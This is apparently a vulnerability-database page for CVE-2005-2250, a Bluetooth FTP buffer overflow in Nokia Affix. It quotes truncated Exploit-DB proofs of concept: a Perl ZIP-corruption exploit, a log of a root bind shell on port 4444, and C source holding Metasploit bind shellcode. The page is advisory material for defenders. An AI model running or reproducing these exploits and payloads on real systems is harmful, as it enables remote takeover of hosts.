CVE-2005-2250
published 2005-07-13CVE-2005-2250: Buffer overflow in Bluetooth FTP client (BTFTP) in Nokia Affix 2.1.2 and 3.2.0 allows remote attackers to execute arbitrary code via a long filename in an OBEX…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
10.30%
95.1th percentile
Buffer overflow in Bluetooth FTP client (BTFTP) in Nokia Affix 2.1.2 and 3.2.0 allows remote attackers to execute arbitrary code via a long filename in an OBEX file share.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
| nokia | affix | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
exploitdb·2011-07-08
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
---
#!/usr/bin/perl
#
#[+]Exploit Title: ZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit
#[+]Date: 08\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipWiz-2005/3000-2250_4-10011590.html
#[+]Version: v5.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $head2 = "\x50\x4B\x01\x02
Exploit-DB
Nokia Affix < 3.2.0 - btftp Remote Client
exploitdb·2005-07-03
CVE-2005-2250 Nokia Affix < 3.2.0 - btftp Remote Client
Nokia Affix open 00:04:3e:65:a1:c8
Connected.
ftp> ls
Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V
Ϲ¿)ýÞ
ýÞÑýÞÐÉî¼Xq¶X6¶Y0
root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
Trying 192.168.1.207...
Connected to 192.168.1.207.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
hostname;
threat
: command not found
*/
#include
#include
main()
{
FILE *malfile;
/* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex http://metasploit.com */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xeb\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x99"
"\xee\x30\x5e\x83\xee\xfc\xe2\xf4\xa8\x35\x63\x1d\xca\x84\x32\x34"
"\xff\xb6\xa9\xd7\x78\x23\xb0\xc8\xda\xbc\x56\x36\x88\xb2\x56\x0d"
"\x10\x0f\x5a\x38\xc1\xbe\x61\x08\x10\x0f\xfd\xde\x29\x88\xe1\x
No writeups or analysis indexed.
http://affix.sourceforge.net/affix_212_sec.patchhttp://www.debian.org/security/2005/dsa-762http://www.digitalmunition.com/DMA%5B2005-0712a%5D.txthttp://www.securityfocus.com/bid/14230http://affix.sourceforge.net/affix_212_sec.patchhttp://www.debian.org/security/2005/dsa-762http://www.digitalmunition.com/DMA%5B2005-0712a%5D.txthttp://www.securityfocus.com/bid/14230
2005-07-13
Published